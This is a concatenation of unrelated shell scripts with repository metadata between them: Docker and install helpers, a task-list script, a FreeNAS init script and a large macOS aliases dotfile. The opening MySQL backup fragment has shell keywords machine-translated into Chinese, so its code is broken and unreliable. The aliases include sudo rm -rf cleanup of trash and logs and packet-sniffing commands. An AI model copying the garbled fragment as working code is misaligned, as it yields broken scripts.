mysqlbinlog -d $ db --start-datetime = “ $ StartTime ” $ DATA_DIR / $ i >> $ backup_file || {warning “数据库$ db备份失败” ; 继续; }
注意“增量备份$ db end。”
DONE
DONE
for db in $ dbs
做
本地 backup_dir = $ BACKUP_DIR “ / increment / ” $ db
本地文件名= $ db “。” $ TIME
local backup_file = $ backup_dir “ / ” $ filename “ .sql ”
cd $ backup_dir
tar -cPzf $ filename “ .tar.gz ” $ filename “ .sql ”
rm -f $ backup_file
注意“数据库$ db备份成功” ;
DONE
}
案例 “ $ 1 ” in
充分)
full_backup
;;
增量)
increment_backup
;;
*)
出口 2
;;
ESAC
| true
|
82a2449a2b04bcabb7b181f9fd0a4f4f6183c8fe
|
Shell
|
carbonblack/cb-event-forwarder
|
/run-event-forwarder.sh
|
UTF-8
| 2,297
| 4.09375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
LABEL=edreventforwarder
IMAGE=eventforwarder/centos7:latest
CONFIG_DIR_EXTERNAL=/etc/cb/integrations/event-forwarder
CONFIG_DIR=/etc/cb/integrations/event-forwarder
LOG_DIR_EXTERNAL=/var/log/cb/integrations/cb-event-forwarder
LOG_DIR=/var/log/cb/integrations/cb-event-forwarder
MOUNT_POINTS="--mount type=bind,source=$CONFIG_DIR_EXTERNAL,target=$CONFIG_DIR --mount type=bind,source=$LOG_DIR_EXTERNAL,target=$LOG_DIR"
SERVICE_START=/usr/share/cb/integrations/event-forwarder/cb-event-forwarder
get_container_status () {
CONTAINER_NAME=$(docker ps | grep $LABEL | head -n1 | awk '{print $1}')
if [ "${#CONTAINER_NAME}" -gt 0 ]; then
CONTAINER_RUNNING=true
echo "EDR Event Forwarder Container status: Running"
echo "EDR Event Forwarder Container identifier: ${CONTAINER_NAME}"
else
# run ps with -a switch to see if stopped or non-existent
STOPPED_NAME=$(docker ps | grep $LABEL | head -n1 | awk '{print $1}')
if [ "${#STOPPED_NAME}" -gt 0 ]; then
echo "EDR Event Forwarder Container status: Stopped "
else
echo "EDR Event Forwarder Container status: No running container"
fi
CONTAINER_RUNNING=false
fi
}
STATUS_COMMAND=get_container_status
SHUTDOWN_COMMAND=stop_and_remove_container
stop_and_remove_container() {
docker stop $LABEL > /dev/null
docker rm $LABEL > /dev/null
}
STARTUP_COMMAND="docker run -d --restart unless-stopped $MOUNT_POINTS --name $LABEL $IMAGE $SERVICE_START"
print_help() {
echo "Usage: edr-eventforwarder-run COMMAND [options]"
echo
echo "Options:"
echo " -h, --help Print this help message."
echo
echo "COMMANDs:"
echo " start Start the connector"
echo " stop Stop the connector"
echo " status Stop the connector"
exit 2
}
PARSED=$(getopt -n run -o o: --long osversion:,help -- "$@")
if [ "${?}" != "0" ]; then
print_help
fi
if [[ "${1}" == "" ]]; then
echo "COMMAND required"; print_help
fi
if [[ "${1^^}" =~ ^(START|STOP|STATUS)$ ]]; then
echo "EDR Event Forwarder: running command ${1}..."
case "${1^^}" in
START) $STARTUP_COMMAND ;;
STOP) $SHUTDOWN_COMMAND ;;
STATUS) $STATUS_COMMAND ;;
esac
else
echo "run: invalid command '${1}'"; print_help
fi
| true
|
36e238af53c7a1bba3177f3dba6da34af9abbcbf
|
Shell
|
dmcgrady/zsh
|
/plugins/zsh-os/bin/tasks
|
UTF-8
| 2,071
| 3.796875
| 4
|
[] |
no_license
|
#!/usr/bin/env zsh
typeset -A Module Commands
# ------------------------------------------------------
# dnet
# ------------------------------------------------------
Module=(
Name 'tasks'
About 'Interact with vim-tasks from a command-line'
Author 'Dan McGrady <dan@dmix.ca>'
Repo 'https://github.com/dmix/bin'
)
# Help -------------------------------------------------
Help() { cat << EOF
Usage:
tasks <all|next|project> <filter>
all = [optional] list all tasks
next = [default] show next 3 tasks
project = [optional] filter tasks by project
Example:
$ tasks OR tasks next
> Listing next 3 tasks todo...
>
> 1. Take out trash @home
> 2. Fix bed @home
> 3. Call peter @work
$ tasks project home
> Listing tasks for project @home...
>
> 1. Take out trash @home
> 2. Fix bed @home
EOF
exit
}
# Options -------------------------------------------------
File="$HOME/notes/now.todo"
Action=$1 # list, next, etc
Commands=(
'all' tasks-all
'next' tasks-next
'now' tasks-now
'project' tasks-project
'done' tasks-done
)
# program -------------------------------------------------
tasks-all() {
echo "vim-tasks: Listing all tasks... \n"
egrep '☐|:|✔"' $File | grep -v "✔"
echo "" && exit
}
tasks-now() {
echo "vim-tasks: Listing next 3x high priority tasks...\n"
grep -A 3 "HIGH:" $File | grep "☐"
echo "" && exit
}
tasks-next() {
echo "vim-tasks: Listing next tasks...\n"
egrep '☐|:|✔"' $File | grep -v "✔"
echo "" && exit
}
tasks-project() {
local _filter=$1
echo "vim-tasks: Listing tasks for project @$_filter... \n"
grep "@$_filter" $File
echo "" && exit
}
tasks-done() {
echo "vim-tasks: Listing completed tasks... \n"
grep '✔' $File
echo "" && exit
}
# Run Program
# ------------------------------------------------------
[ "$Action" = "-h" ] && Help
# Disable Logger
[ ! $Action ] && Action="next"
$Commands[$Action] $@
| true
|
7a71a6a72525814e1f0bbb67ebdac8065197bfeb
|
Shell
|
milksteak-project/steaks
|
/packages/libnl/libnl.sh
|
UTF-8
| 1,130
| 4
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
TMPDIR="$HOME/usr/tmp"
PACKAGE="libnl"
VERSION="master" #2.0
SOURCE="${PACKAGE}-${VERSION}"
ZIP="${SOURCE}.zip"
LINK="https://github.com/sigma-1/${PACKAGE}/archive/${VERSION}.zip"
DEPS="bison"
# -- Install dependencies
function install_dependencies() {
brew install $DEPS
}
echo -e ">>>>> Installing dependencies..."
install_dependencies &> /dev/null
# -- Fetch source
function fetch_package() {
# -- Fetch source ZIP
test -e $ZIP || wget -O $TMPDIR/$ZIP $LINK -q --show-progress
# -- Unpack ZIP
cd $TMPDIR ; unzip -o $ZIP | pv -l >/dev/null
}
echo -e ">>>>> Fetching sources..."
fetch_package &> /dev/null
# -- Install package
function install_package() {
cd ${TMPDIR}/${SOURCE}
./autogen.sh
./configure --prefix=$HOME/usr
make ; make install PREFIX=$HOME/usr
mkdir -p $HOME/usr/include
cp -r ${TMPDIR}/${SOURCE}/include/linux $HOME/usr/include
}
echo -e ">>>>> Installing package..."
install_package &> /dev/null
# -- Cleanup
function cleanup() {
cd $TMPDIR
rm $ZIP
rm -rf $SOURCE
}
echo -e ">>>>> Cleaning up..."
cleanup &> /dev/null
echo -e "$PACKAGE has been successfully installed!"
| true
|
c96a8a2a06511f13e08b4bb249c6b8faac791cb7
|
Shell
|
cspace-deployment/cspace-webapps-ucb
|
/ucjeps/apps/merritt_archive/code/batch/run_tidy.sh
|
UTF-8
| 273
| 2.59375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# tidy up files from 5 before last date of archiving activity
cd /cspace/merritt/batch
FILES_TO_DELETE=$(ls /cspace/merritt/jobs/mrt-*.completed.csv | tail -5 | head -1)
echo tidying up $FILES_TO_DELETE
./step5_tidy_up.sh $FILES_TO_DELETE > /dev/null
| true
|
27ac260bc866ab05bf5ee56c807a5ef8dd71933b
|
Shell
|
openstack-charmers/migration-tools
|
/tobzr/push-charms
|
UTF-8
| 1,323
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash -e
echo "===== $(basename $0) ====="
for charm in `ls -1 bzr/stable/`; do
if [[ -d bzr/current/stable/$charm && -d bzr/stable/$charm ]]; then
(
cd bzr/current/stable/$charm
old_revno=$(bzr revno)
cd -
cd bzr/stable/$charm
new_revno=$(bzr revno)
if [ "$old_revno" != "$new_revno" ]; then
echo " + Pushing $charm stable charm"
echo "$(pwd) --> $(bzr config parent_location)"
bzr push --overwrite :parent
else
echo " + No change since revno $new_revno, not pushing $charm stable charm"
fi
)
fi
done
for charm in `ls -1 bzr/next/`; do
if [[ -d bzr/current/next/$charm && -d bzr/next/$charm ]]; then
(
cd bzr/current/next/$charm
old_revno=$(bzr revno)
cd -
cd bzr/next/$charm
new_revno=$(bzr revno)
if [ "$old_revno" != "$new_revno" ]; then
echo " + Pushing $charm next charm"
echo "$(pwd) --> $(bzr config parent_location)"
bzr push --overwrite :parent
else
echo " + No change since revno $new_revno, not pushing $charm next charm"
fi
)
fi
done
| true
|
7436372ba5c2ebbc1695d452fd8fb47a1bab14f2
|
Shell
|
Nerevarishe/saas-crm-dashboard
|
/dev-build-frontend.sh
|
UTF-8
| 631
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# Export all variables from .env
source .env
printf '\e[1;32m%-6s\e[m\n' "Building dependencies images"
printf '\e[1;32m%-6s\e[m\n' "Build node image with dependencies"
docker build -t $DOCKER_IMAGE_PREFIX-node-dependencies:latest -f ./alpine-deps-images/Dockerfile-node .
printf "\n\n"
printf '\e[1;32m%-6s\e[m\n' "Building frontend image"
docker build -t $DOCKER_IMAGE_PREFIX-node-build:latest -f ./web-app-images/Dockerfile-frontend-build .
docker build -t $DOCKER_IMAGE_PREFIX-frontend:latest -f ./web-app-images/Dockerfile-frontend .
printf "\n\n\n"
printf '\e[1;32m%-6s\e[m\n' "Srtarting app"
docker-compose up
| true
|
f22ec57f8b022d0c98353d3572296c4a6d870c97
|
Shell
|
davidje13/snowball_koth_pitn
|
/simple.sh
|
UTF-8
| 276
| 2.984375
| 3
|
[] |
no_license
|
TURN="$1";
ME_BALLS="$2";
THEM_BALLS="$3";
ME_DUCKS="$4";
THEM_DUCKS="$5";
MAX_BALLS="$6";
if (( ME_BALLS > THEM_BALLS + THEM_DUCKS )); then
echo "1";
elif (( ME_BALLS == 0 )) && (( THEM_BALLS == 0 )); then
echo "0";
else
RND="$RANDOM";
(( RND %= 3 ));
echo "$RND";
fi;
| true
|
7be8b6802ef618fd10c492870d6e91d96c5257fd
|
Shell
|
shahid1996/BuildXSS
|
/Sources/ShortEvents.sh
|
UTF-8
| 319
| 2.5625
| 3
|
[] |
no_license
|
#!/bin/bash
arrShortEvent[0]="oncut= "
arrShortEvent[1]="onload= "
arrShortEvent[2]="onclick= "
arrShortEvent[3]="onerror= "
arrShortEvent[4]="onfocus= "
arrShortEvent[5]="onshow= "
arrShortEvent[6]="onwhell= "
randShortEvent=$[ $RANDOM % 7 ]
arrShortEvent=${arrShortEvent[$randShortEvent]}
#Short JavaScript Events
| true
|
df926be9d8060d606d1ca23d868af678379d2543
|
Shell
|
tcdog001/project_tools
|
/ltefi_md_hisisdk.init
|
UTF-8
| 545
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
. ltefi_md_git.in
readonly HISISDK=hisisdk
main() {
local user=$(whoami)
local PRO_PATH=/home/${user}/histb
if [ ${user} != ${HISISDK} ]; then
echo "warning: user!=${HISISDK}, exit!"
exit 0
fi
if [ -f "${PRO_PATH}/autelan" ]; then
echo "warning: ${PRO_PATH}/autelan exist, exit!"
exit 0
fi
mkdir -p ${PRO_PATH}
pushd ${PRO_PATH}
echo "#### PROJECT PATH: $(pwd) ####"
git_clone_md_package ${user}
cd autelan
git_clone_md_release ${user}
git_clone_md_custom ${user}
git_clone_md_ptest ${user}
popd
}
main
| true
|
bb107aebbde8940dd921052d556360430bf29263
|
Shell
|
XorgX304/sandscout
|
/profile_compilation/processAllVersions.sh
|
UTF-8
| 875
| 4.03125
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
#this is a wrapper for processAllProfiles.sh that just calls it on each version we have SBPL profiles for.
#usage details
if test $# -ne 2; then
echo "Usage: $0 directory_containing_SBPL_directories directory_for_output" 1>&2
echo "Example: $0 ios-sandbox-profiles all_version_processed_sandbox_profiles" 1>&2
exit 1
fi
input_directories=$1/*
output_dir=$2
mkdir $output_dir
for directory in $input_directories
do
basepath=`basename $directory`
echo "##################################################################"
echo "processing SBPL profiles for $basepath"
echo "##################################################################"
mkdir $output_dir/$basepath
mkdir $output_dir/$basepath/individual_profiles
./processAllProfiles.sh $directory $output_dir/$basepath/individual_profiles $output_dir/$basepath/all_profile_facts.pl
done
| true
|
a306a5d08c4d0f25f765f1d178e76669e21f772f
|
Shell
|
abbi-gaurav/fsm-extension-installer-kyma
|
/internal/build.sh
|
UTF-8
| 491
| 2.8125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
. ../VERSIONINFO
echo "Start to build the extension installler"
echo "======nodejs build=================================="
cd ../backend
npm run build:prod
cd ..
echo "======docker build=================================="
docker build -t sapfsm/fsm-extension-installer-for-kyma:$appVersion .
echo "======docker push=================================="
docker push sapfsm/fsm-extension-installer-for-kyma:$appVersion
echo "Extension installer is built successfully!"
| true
|
1ba6eec0ded4de53c2d3df8864d0388deced529d
|
Shell
|
miral158/shell_script
|
/case.bash
|
UTF-8
| 278
| 3.234375
| 3
|
[] |
no_license
|
# echo "please enter your choice"
# echo "a = display date and time"
# echo "b = List files and directory"
# echo "c = check system uptime"
# read choices
# case $choices in
# a) date;;
# b) ls;;
# c)uptime;;
# *) echo "invalid option"
# esac
read name
echo "welcome $name"
| true
|
41308f8c44742ee5b9e9aba36c970a283612adb7
|
Shell
|
rkcho317/2401
|
/run.sh
|
UTF-8
| 568
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
#Author: Rosa Cho
#Program name: Rectangle and Perimeter Demo
rm *.o, *.lis, *.out
echo " " #Blank line
echo "Assemble the X86 file perimeter.asm"
nasm -f elf64 -l perimeter.lis -o perimeter.o perimeter.asm
echo "Compile the C++ file array-main.cpp"
g++ -c -m64 -Wall -std=c++14 -o rectangle.o -fno-pie -no-pie rectangle.cpp
echo "Link the 'O' files rectangle.o and perimeter.o"
g++ -m64 -std=c++14 -fno-pie -no-pie -o peri.out rectangle.o perimeter.o
echo "Run the program Perimeter"
./peri.out
echo "This Bash script file will now terminate. Bye."
| true
|
a320c5bfd9f57800da41d4dc534f79944979eec3
|
Shell
|
hhy5277/headset-electron
|
/linux/bin/build_installer.sh
|
UTF-8
| 472
| 2.78125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
source="build/Headset-linux-x64"
destination="build/installers"
echo -e '\n\033[1mPackaging deb installer: \033[01;0m'
electron-installer-debian \
--src $source \
--dest $destination \
--arch amd64 \
--config bin/configurations/config_deb.json
echo -e '\n\033[1mPackaging rpm installer: \033[01;0m'
electron-installer-redhat \
--src $source \
--dest $destination \
--arch x86_64 \
--config bin/configurations/config_rpm.json
| true
|
605da87dc78432a3813c76908a9ebdc8ee8cbe8c
|
Shell
|
davep-github/dpw
|
/bin/trivial-assoc
|
UTF-8
| 1,228
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash
source script-x
set -u
progname="$(basename $0)"
source eexec
if vsetp "${eexec_program-}" # Did the caller provide a program?
then
EEXEC_SHIFT=:
else
eexec_program=$(EExec_parse "$@")
EEXEC_SHIFT=shift
fi
for op in $eexec_program
do
$op
${EEXEC_SHIFT}
done
EExec_verbose_msg $(echo_id eexec_program)
unset eexec_program
# Or export eexec_program to propagate eexec info to a called program.
# export eexec_program
file_name="${1}"
shift
ret=
sep=
while (($# > 0))
do
field_name="${1}"
#ORIGvvvv -- fails on pid because it isn't in quotes.
#val=$(cat "${file_name}" | EExec sed -rn "s/(.*)(${field_name})( \. \")([a-zA-Z_0-9-]*)(.*)/\4/p")
# Hack to make pids work, but not robust.
val=$(cat "${file_name}" | EExec sed -rn "s/(.*)(${field_name})( \. \"?)([a-zA-Z_0-9-]*)(.*)/\4/p")
# Last digit of pid is in another match sub-expression.
#val=$(cat "${file_name}" | EExec sed -rn "s/(.*)(${field_name})( \. (([0-9]+)|\")([a-zA-Z_0-9-]+))(.*)/\5/p")
# trying to delineate sub-exp matches.
val=$(cat "${file_name}" | EExec sed -rn "s/(.*)(${field_name})( \. (([0-9]+)|\"([a-zA-Z_0-9-]+)))(.*)/\5/p")
ret="${ret}${sep}${val}"
sep=" "
shift
done
echo $ret
| true
|
ea2c63754ae76731fea04f0e624bbf0ebaff9e55
|
Shell
|
RafaelFino/learnops
|
/scripts/sysmon.sh
|
UTF-8
| 585
| 3.421875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#@Author Shahriar Shovon
#@Github https://github.com/shovon8/sysmon
printf "%-10s%-15s%-15s%s\n" "PID" "OWNER" "MEMORY" "COMMAND"
function sysmon_main() {
RAWIN=$(ps -o pid,user,%mem,command ax | grep -v PID | awk '/[0-9]*/{print $1 ":" $2 ":" $4}')
for i in $RAWIN
do
PID=$(echo $i | cut -d: -f1)
OWNER=$(echo $i | cut -d: -f2)
COMMAND=$(echo $i | cut -d: -f3)
MEMORY=$(pmap $PID | tail -n 1 | awk '/[0-9]K/{print $2}')
printf "%-10s%-15s%-15s%s\n" "$PID" "$OWNER" "$MEMORY" "$COMMAND"
done
}
sysmon_main | sort -bnr -k3
| true
|
67b8986b92c333884de49b190e997e4c00fc4670
|
Shell
|
quater/freenas-9.2-xen
|
/nanobsd/Files/etc/ix.rc.d/ix-preinit
|
UTF-8
| 636
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/sh
#
# $FreeBSD$
#
# PROVIDE: ix-preinit
# REQUIRE: FILESYSTEMS
# BEFORE: SERVERS
. /etc/rc.subr
do_preinit()
{
local IFS="|"
local f="ini_type ini_command ini_script ini_when"
eval local $f
local sf=$(var_to_sf $f)
${FREENAS_SQLITE_CMD} ${FREENAS_CONFIG} \
"SELECT $sf FROM system_initshutdown WHERE ini_when = 'preinit' ORDER BY id" | \
while eval read -r $f; do
if [ "${ini_type}" = "command" ]; then
eval ${ini_command}
else
if [ -e "${ini_script}" ]; then
sh -c "exec ${ini_script}"
fi
fi
done
}
name="ix-preinit"
start_cmd='do_preinit'
stop_cmd=':'
load_rc_config $name
run_rc_command "$1"
| true
|
4728a71b1121f6ba200daa210510a6c97a63c6f0
|
Shell
|
totara/totara-docker-dev
|
/bin/tlogs
|
UTF-8
| 540
| 3.28125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
script_path="$( cd "$(dirname "$0")" ; pwd -P )"
project_path="$( cd $script_path && cd ..; pwd -P )"
args=("--follow" "--no-log-prefix")
tail="--tail=20"
container=""
for arg in "$@"; do
if [[ "$arg" =~ "--tail" ]]; then
tail="$arg"
elif [[ "$arg" == "-f" || "$arg" == "--follow" || "$arg" == "--no-log-prefix" ]]; then
continue
elif [[ "$arg" == -* ]]; then
args+=("$arg")
else
container="$arg"
fi
done
args+=("$tail")
$script_path/tdocker logs "${args[@]}" "$container"
| true
|
7ef2331616578229534cb40141feaeb6c3bf7478
|
Shell
|
ArkieCoder/dockerized-RoR
|
/rr_new
|
UTF-8
| 919
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
cat Gemfile.guardgems >> Gemfile
./build
./up -d
./rr new . --force --database=sqlite3
cat Gemfile.postrrnew >> Gemfile
cat Gemfile.guardgems >> Gemfile
./down
./build
./up -d
./aa_inst
./set_env
echo -n "Do you want to run database migrations for ActiveAdmin? [Y/n] "
read ans
if [ "$ans" == "n" ]
then
echo "Not running migrations now"
else
echo "Running migrations for ActiveAdmin:"
./rr db:migrate RAILS_ENV=development
fi
echo -n "Do you want to seed database with ActiveAdmin data? [Y/n] "
read ans
if [ "$ans" == "n" ]
then
echo "Not seeding database now"
else
echo "Seeding database with ActiveAdmin data:"
./rr db:seed RAILS_ENV=development
fi
./rr generate datatable:config
./down
rm -f OFF
mkdir -p app/inputs
mv nchar_input.rb uuid_input.rb app/inputs
mkdir -p app/controllers/concerns
mv response.rb app/controllers/concerns
mv cors.rb config/initializers
more rr_new.README
| true
|
9646498ff89bdf0c51ac3a7bc1d5bb50a5bafa0b
|
Shell
|
steflen/dotfiles-2
|
/.aliases
|
UTF-8
| 15,592
| 3.40625
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Easier navigation: .., ..., ...., ....., ~ and -.
alias ..="cd .."
alias ...="cd ../.."
alias ....="cd ../../.."
alias .....="cd ../../../.."
alias ~="cd ~" # `cd` is probably faster to type though
alias -- -="cd -"
##
# SHORTCUTS.
##
alias d="cd ~/Documents"
alias dl="cd ~/Downloads"
alias dr="cd ~/Dropbox"
alias dt="cd ~/Desktop"
alias p="cd ~/Projects"
alias s="cd ~/Sites"
alias data="cd ~/data"
alias dev="cd ~/dev"
alias dot="cd ~/dotfiles"
alias ss="cd ~/.ssh"
alias g="git"
# - - - - - - - - - - - - - - - - - - - -
# Directory Listing
# - - - - - - - - - - - - - - - - - - - -
# Always Use Colour Output For "ls".
if [[ "$OSTYPE" =~ ^darwin ]]; then
alias ls='command ls --color=auto';
COLORFLAG="--color";
export COLORFLAG;
#export LSCOLORS='BxBxhxDxfxhxhxhxhxcxcx';
export LSCOLORS='gxfxcxdxbxGxDxabagacad';
else
alias ls='command ls --color=auto';
COLORFLAG="--color"
export COLORFLAG
export LS_COLORS='no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.ogg=01;35:*.mp3=01;35:*.wav=01;35:';
fi;
# List All Files Colorized In Long Format.
#alias l="ls -lF ${COLORFLAG}"
# List All Files Colorized In Long Format, Excluding . And ..
#alias la="ls -lAF ${COLORFLAG}"
# List Only Directories.
#alias lsd="ls -lF ${COLORFLAG} | grep --color=never '^d'"
# Always Use Color Output For `ls`.
alias ls='command ls "${COLORFLAG}"'
# - - - - - - - - - - - - - - - - - - - -
# ColorLS
# - - - - - - - - - - - - - - - - - - - -
alias l='colorls --gs --sd'
alias la='colorls -1A --sd --gs --report '
alias ll='colorls -lA --sd --gs --report '
alias lsd='colorls -1d --sd --gs --report '
alias lsf='colorls -1f --sd --gs --report '
alias lsg='colorls -A --sd --gs --report '
alias lst='colorls -A --sd --tree '
# - - - - - - - - - - - - - - - - - - - -
# Grep
# - - - - - - - - - - - - - - - - - - - -
# Always Enable Colored `grep` Output.
# Note: `grep_options="--color=auto"` Is Deprecated, Hence The Alias Usage.
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
##
# ENABLE ALIASES TO BE SUDO’ED.
##
alias sudo='sudo '
##
# GET WEEK NUMBER.
##
alias week='date +%V'
##
# GET macOS SOFTWARE UPDATES, AND UPDATE INSTALLED RUBY GEMS, HOMEBREW, NPM, AND THEIR INSTALLED PACKAGES.
##
#alias update='sudo softwareupdate -i -a; brew update; brew upgrade; brew cleanup; npm install npm -g; npm update -g; sudo gem update --system; sudo gem update; sudo gem cleanup'
alias update='sudo softwareupdate -i -a; brew update; brew upgrade; brew cleanup; npm install npm -g; sudo gem update --system; sudo gem update; sudo gem cleanup'
##
# GOOGLE CHROME.
##
alias chrome='/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome'
alias canary='/Applications/Google\ Chrome\ Canary.app/Contents/MacOS/Google\ Chrome\ Canary'
##
# IP ADDRESSES.
##
alias ip="dig +short myip.opendns.com @resolver1.opendns.com"
alias localip="ipconfig getifaddr en0"
alias ips="ifconfig -a | grep -o 'inet6\? \(addr:\)\?\s\?\(\(\([0-9]\+\.\)\{3\}[0-9]\+\)\|[a-fA-F0-9:]\+\)' | awk '{ sub(/inet6? (addr:)? ?/, \"\"); print }'"
##
# SHOW ACTIVE NETWORK INTERFACES.
##
alias ifactive="ifconfig | pcregrep -M -o '^[^\t:]+:([^\n]|\n\t)*status: active'"
##
# FLUSH DIRECTORY SERVICE CACHE.
##
alias flush="sudo killall -HUP mDNSResponder"
##
# CLEAN UP LAUNCHSERVICES TO REMOVE DUPLICATES IN THE “OPEN WITH” MENU.
##
alias lscleanup="/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -kill -r -domain local -domain system -domain user && killall Finder"
##
# VIEW HTTP TRAFFIC.
##
alias sniff="sudo ngrep -d 'en1' -t '^(GET|POST) ' 'tcp and port 80'"
alias httpdump="sudo tcpdump -i en1 -n -s 0 -w - | grep -a -o -E \"Host\: .*|GET \/.*\""
##
# CANONICAL HEX DUMP; SOME SYSTEMS HAVE THIS SYMLINKED.
##
command -v hd > /dev/null || alias hd="hexdump -C"
##
# macOS HAS NO `MD5SUM`, SO USE `MD5` AS A FALLBACK.
##
command -v md5sum > /dev/null || alias md5sum="md5"
##
# macOS HAS NO `SHA1SUM`, SO USE `SHASUM` AS A FALLBACK.
##
command -v sha1sum > /dev/null || alias sha1sum="shasum"
##
# JAVASCRIPTCORE REPL.
##
jscbin="/System/Library/Frameworks/JavaScriptCore.framework/Versions/A/Resources/jsc";
[ -e "${jscbin}" ] && alias jsc='${jscbin}';
unset jscbin;
##
# TRIM NEW LINES AND COPY TO CLIPBOARD.
##
alias c="tr -d '\n' | pbcopy"
##
# RECURSIVELY DELETE `.DS_STORE` FILES.
##
alias cleanup="find . -type f -name '*.DS_Store' -ls -delete"
##
# EMPTY THE TRASH ON ALL MOUNTED VOLUMES AND THE MAIN HDD.
# Also, clear Apple’s System Logs to improve shell startup speed.
# Finally, clear download history from quarantine. https://mths.be/bum.
##
alias emptytrash="sudo rm -rfv /Volumes/*/.Trashes; sudo rm -rfv ~/.Trash; sudo rm -rfv /private/var/log/asl/*.asl; sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV* 'delete from LSQuarantineEvent'"
##
# SHOW/HIDE HIDDEN FILES IN FINDER.
##
alias show="defaults write com.apple.finder AppleShowAllFiles -bool true && killall Finder"
alias hide="defaults write com.apple.finder AppleShowAllFiles -bool false && killall Finder"
##
# HIDE/SHOW ALL DESKTOP ICONS (USEFUL WHEN PRESENTING).
##
alias hidedesktop="defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
alias showdesktop="defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
##
# URL-ENCODE STRINGS.
##
alias urlencode='python -c "import sys, urllib as ul; print ul.quote_plus(sys.argv[1]);"'
##
# MERGE PDF FILES, PRESERVING HYPERLINKS.
# @USAGE:
# `mergepdf input{1,2,3}.pdf`
##
alias mergepdf='gs -q -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=_merged.pdf'
##
# DISABLE SPOTLIGHT.
##
alias spotoff="sudo mdutil -a -i off"
##
# ENABLE SPOTLIGHT.
##
alias spoton="sudo mdutil -a -i on"
##
# PLISTBUDDY ALIAS, BECAUSE SOMETIMES `DEFAULTS` JUST DOESN’T CUT IT.
##
alias plistbuddy="/usr/libexec/PlistBuddy"
##
# RING THE TERMINAL BELL, AND PUT A BADGE ON TERMINAL.APP’S DOCK ICON.
# (useful when executing time-consuming commands)
##
alias badge="tput bel"
##
# INTUITIVE MAP FUNCTION.
# @EXAMPLE: To list all directories that contain a certain file:
# find . -name .gitattributes | map dirname
##
alias map="xargs -n1"
##
# ONE OF @JANMOESEN’S PROTIP™S.
##
for method in GET HEAD POST PUT DELETE TRACE OPTIONS; do
alias "${method}"='lwp-request -m "$method"'
done
##
# MAKE GRUNT PRINT STACK TRACES BY DEFAULT.
##
command -v grunt > /dev/null && alias grunt="grunt --stack"
##
# STUFF I NEVER REALLY USE BUT CANNOT DELETE EITHER BECAUSE OF HTTP://XKCD.COM/530/.
##
alias stfu="osascript -e 'set volume output muted true'"
alias pumpitup="osascript -e 'set volume output volume 100'"
##
# KILL ALL THE TABS IN CHROME TO FREE UP MEMORY.
###
alias chromekill="ps ux | grep '[C]hrome Helper --type=renderer' | grep -v extension-process | tr -s ' ' | cut -d ' ' -f2 | xargs kill"
##
# LOCK THE SCREEN (WHEN GOING AFK).
##
alias afk="/System/Library/CoreServices/Menu\ Extras/User.menu/Contents/Resources/CGSession -suspend"
##
# RELOAD THE SHELL (I.E. INVOKE AS A LOGIN SHELL).
##
alias reload='exec ${SHELL} -l'
##
# PRINT EACH PATH ENTRY ON A SEPARATE LINE.
##
alias path='echo -e ${PATH//:/\\n}'
##
# ADD A "SPACER" TO THE macOS DOCK.
##
alias adddockspacer="defaults write com.apple.dock persistent-apps -array-add '{\"tile-type\"=\"spacer-tile\";}' && killall Dock";
#
# ----------------------------------------------------------------------------------------------------------------------
#
# APPLICATION-SPECIFIC ALIASES
#
# ----------------------------------------------------------------------------------------------------------------------
#
################################################################################
#
# NPM
#
################################################################################
# `npm` ALIAS.
alias np='npm';
# `npm install` ALIAS.
alias npi='npm i';
alias npis='npm i --save';
alias npig='npm i -g';
# `npm list` ALIAS.
alias npl='npm ls --depth=0';
alias nplg='npm ls -g --depth=0';
# `npm search`
alias nps='npm search';
# `npm test` ALIAS.
alias npt='npm t';
# `npm update` ALIAS.
alias npu='npm up';
alias npug='npm up -g';
# `npm uninstall` ALIAS.
alias npun='npm un';
alias npung='npm un -g';
################################################################################
#
# YARN
#
################################################################################
# `yarn` ALIAS.
alias yar='yarn';
# `yarn add` ALIAS.
alias yarna='yarn add';
alias yarnad='yarn add -D';
alias yarnap='yarn add -P';
alias yarnag='yarn global add';
# `yarn install` ALIAS.
alias yarni='yarn install';
# `yarn list` ALIAS.
alias yarnl='yarn list --depth=0';
alias yarnlg='yarn global list --depth=0';
# `yarn remove` ALIAS.
alias yarnr='yarn remove';
alias yarnrg='yarn global remove';
